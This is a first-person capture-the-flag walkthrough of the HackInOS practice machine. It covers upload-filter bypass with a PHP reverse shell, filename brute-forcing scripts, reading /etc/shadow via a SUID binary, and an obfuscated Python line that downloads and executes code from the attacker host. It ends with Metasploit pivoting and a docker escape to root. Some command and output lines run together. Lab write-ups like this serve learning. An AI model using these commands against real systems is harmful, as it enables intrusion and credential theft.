HackInOS is described as a beginner level CTF-style vulnerable machine. This one is particularly challenging because there are multiple subnets involved. That means the vulnerable machine is also the host of a local subnet I find later, the range is 172.18.0.0/24. Knowing this I have to leverage Metasploit’s pivoting tools such as autoroute to maneuver the attack to the neighboring subnet from the HackInOS box. This is the HackInOS level 1 vulnhub tutorial.
Want to setup a home pentesting lab to practice your ethical hacking skills? I spell out how it’s done in the 10 easy steps post.
- DC-1 vulnerable machine from vulnhub. (VirtualBox)
- Kali Linux virtual machine. (VirtualBox)
The first step is to list the running services on the HackInOS vulnerable box. For this I use a variety of tools, nmap, netdiscover. Whenever I start the host enumeration and information gathering phase in Kali Linux I prepare the new workspace. See the commands I use below.
# FOLLOW THESE DIRECTIONS!
# start the database server
root@kali:~ service postgresql start
root@kali:~ msfdb init
root@kali:~ msfconsole
# create workspace. -a for "add"
msf > workspace -a hios
msf > workspace hiosLooking at the results of my scan I can tell that the host is Ubuntu, that openSSH is installed which means that ssh is most likely enabled. Additionaly Apache is running and it’s version 2.4.25. These are all details that will be used later to root the machine.
Knowing that port 8000 is open I navigate to <ip address>:8000 and notice the blog is up and running. Now this is a good time to use dirb to brute force the directories of the web server.
root@kali:~# dirb http://10.0.2.15:8000
http://10.0.2.15:8000/robots.txt
http://10.0.2.15:8000/upload.php if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){
$uploadOk = 1;
}else{
$uploadOk = 0;
echo ":)";
}
if($uploadOk == 1){
move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
echo "File uploaded /uploads/?";
}
At the bottom of the page’s source code a hint is found. It contains a link to a Github page with the code for the upload.php server-side script. Looking closely at the code I see there is an input check for the file type of the file uploaded via the web interface. The trick is to bypass this check I can do so simply by fooling the script into believing what I am uploading is one of the verified types. I accomplish this by adding the .gif file type header to an existing reverse web shell written in PHP found in Kali. That means I add “GIF98” to php-reverse-shell and then upload it to upload.php. And with that a message confirms that the shell script was uploaded, “File uploaded /uploads/?”.
Here is the next issue: the author of the lab has designed the next steps to be increasingly more difficult than the last. I need to know the filename to be able to execute it using the terminal. (In this case I used dirb’s script execution capability). The filename is randomized by design. The new filename is the MD5 hash of the original filename and a random number between 1 and 100.
- myshell.php1-100
- md5sum(myshell.php1-100)
- s37zdxbe7z8723.php
Now that I have all possible filenames in a wordlist, which I have named wl.txt, it’s time to revisit dirb. This tool will actually execute my PHP script upon finding a successful match for it in the uploads directory on the web server. Using bash and Python I create a script to hammer out 100 possible filepaths since that is technically what we need to find.
for i in $(seq 0 101)
do
f="shell.php$i"
echo "$f"
md5="$f" | md5sum | cut -d' ' -f1 | tr -d '\n'
echo "$md5.php"
done
Here is the same script ported into Python.
import hashlib
for n in range(0,100):
newFileName = "shell.php" + str(n)
hashObj = hashlib.md5(newFileName)
# re add php extension to our paylaod script
fullFileName = hashObj.hexdigest() + ".php"
with open("wl.txt","a+") as f:
f.write(fullFileName+'\n')
After uploading the reverse PHP web shell I start a netcat listener on my Kali Linux machine. With the listener running using dirb against the wordlist makes the connection and I now have a reverse shell on the server.
root@kali:~# dirb http://10.0.2.15:8000/uploads/ wl.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
URL_BASE: http://10.0.2.15:8000/uploads/
WORDLIST_FILES: wl.txt
-----------------
GENERATED WORDS: 300
---- Scanning URL: http://10.0.2.15:8000/uploads/ ----
+ http://10.0.2.15:8000/uploads/a483ae0419317c67cc89e14673d7da70.php (CODE:200|SIZE:285)
-----------------
DOWNLOADED: 300 - FOUND: 1
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.15] 54822There is the concept of files with SUID (Set user ID) permission. It refers to files that allow you to execute them with the permission of their owner. Additionally as damaging to security is a determined hacker looking for files that have SUID permission and are owned by root. Meaning read all files even the root-level permissions.
$ find / -perm -4000 -or- find . -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn$ tail -c1G /etc/shadow
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
$ su john
su: must be run from a terminal
$ su root
su: must be run from a terminal
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@1afdd1f6b82c:/$
a WordPress site I look for a common configuration file. The hint about details suggest the next step lies in a settings file. To expedite finding this file, I use find / -name *wp-config*. The details for a MySQL database happen to be found in wp-config.php.
root@1afdd1f6b82c:~# ls
ls
flag
root@1afdd1f6b82c:~# ls -a
ls -a
. .. .bash_history .bashrc .nano .port .profile .wget-hsts flag
root@1afdd1f6b82c:~# cat .port
cat .port
Listen to your friends..
7*
root@1afdd1f6b82c:~# python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.0.2.5:8080/BvHdDL4e72');exec(r.read());"
<'http://10.0.2.5:8080/BvHdDL4e72');exec(r.read());"
To pivot from the already rooted machine to the others I need to use a more advanced Metasploit module, autoroute. Or run autoroute -s 172.18.0.0/24.
msf5 > use auxiliary/scanner/portscan/tcp
msf5 > set RHOSTS 172.18.0.0-50
msf5 > set THREADS 50
msf5 > run
root@1afdd1f6b82c:~# mysql -u wordpress -p wordpress -h 172.18.0.3root@kali:~# john --format=Raw-MD5 hashes.txt
msf5 auxiliary(scanner/portscan/tcp) > ssh [email protected]
hummingbirdscyber@vulnvm:~$ docker run -v /:/root -i -t ubuntu /bin/bash
root@f52988320703:/# cd /root
root@f52988320703:~# ls
bin cdrom etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var
root@f52988320703:~# cd root
root@f52988320703:~/root# ls
flag
root@f52988320703:~/root# cat flag
Congratulations!